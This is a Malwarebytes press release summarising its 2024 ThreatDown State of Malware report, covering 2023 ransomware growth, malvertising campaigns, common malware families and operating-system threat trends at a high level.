Ransomware Attacks Increased by 68% in 2023 according to Malwarebytes’ New “2024 ThreatDown State of Malware Report”
Malwarebytes Annual Report Examines the Most Prevailing Threats and Provides Defense Guidance for Organizations
SANTA CLARA, Calif, February 6, 2024 — Malwarebytes, a global leader in real-time cyber protection, today released its 2024 ThreatDown State of Malware report , which reveals that the United States accounted for almost half of all ransomware attacks in 2023. The annual cybersecurity analysis looks at the most prominent attacks and cybercrime tactics across popular operating systems and how IT teams — particularly those that are resource-constrained — can address them.
“Small and medium-sized organizations face a deluge of cyber threats daily including ransomware, malware and phishing attacks. This new data spotlights the pervasive cat-and-mouse game between cybercriminals and the security and IT teams on the front lines,” said Mark Stockley, Cybersecurity Evangelist, Malwarebytes ThreatDown Labs. “The threat landscape is constantly evolving especially with the explosion of AI and new adversaries with fresh strategies and tactics, but if organizations follow our guidance and become equipped to handle these top threats, they are off to a good start in 2024.”
Big Game Ransomware is on the Rise
Alongside the rise of ransomware attacks in 2023 (68%), the average ransom demand also climbed significantly. The LockBit gang was responsible for the largest known demand, $80 million, following an attack on Royal Mail. Ransomware groups also evolved their tactics, getting scrappier and more sophisticated to target a higher volume of targets at the same time. For example, the CL0P ransomware gang broke established norms with a series of short, automated campaigns, hitting hundreds of unsuspecting targets simultaneously with attacks based on zero-day exploits.
The repeated use of zero-days also signaled a new level of sophistication making CL0P the second most active “big game” ransomware group of 2023, outpacing rivals that were active in every month of the year compared to just a few weeks of activity from CL0P. Lockbit also remained the most widely used ransomware-as-a-service, which accounted for more than twice as many attacks as its nearest competitor in 2023.
Resurgence in Malicious Advertising
Malicious advertising — or malvertising — also made a comeback in 2023 and threatened both businesses and consumers alike. Countless campaigns appeared impersonating brands such as Amazon, Zoom and WebEx to deliver both Windows and Mac malware through highly convincing ads and websites that trick users into downloading malware on their devices. Malwarebytes ThreatDown Labs found Amazon, Rufus, Weebly, NotePad++ and Trading View to be the top five most impersonated brands. In addition, Dropbox, Discord, 4sync, Gitlab and Google emerged as the top five most abused hosts. Malwarebytes ThreatDown Labs also found Aurora Stealer, Vidar, Redline Stealer, BatLoader and IcedID to be the top five most frequently discovered malware.
Operating System Threats
In addition to ransomware and malvertising trends, Malwarebytes ThreatDown Labs found attacks on Android, Mac and Windows devices also evolved. Additional key findings include:
- Android banking trojans: Mawarebytes ThreatDown Labs detected Android banking trojans 88,500 times in 2023. In these attacks, Banking trojans are disguised as regular apps like QR code scanners, fitness trackers, or even copies of popular applications like Instagram to copy banking passwords and steal money directly from accounts.
- Malware on Macs: Malware accounted for 11% of detections on Macs last year. Despite declining PC sales, demand for Macs has grown. Today Macs represent a 31% share of US desktop operating systems, while a quarter of businesses run Macs somewhere on their networks making Apple’s macOS an increasingly significant target for malicious actors.
- Living Off the Land Attacks: Abuse of Windows Management Instrumentation (WMI) was the top technique (27%) for Living Off the Land (LOTL) cyberattacks. In these attacks, criminals carry out malicious activities using legitimate IT administration tools like WMI or Powershell.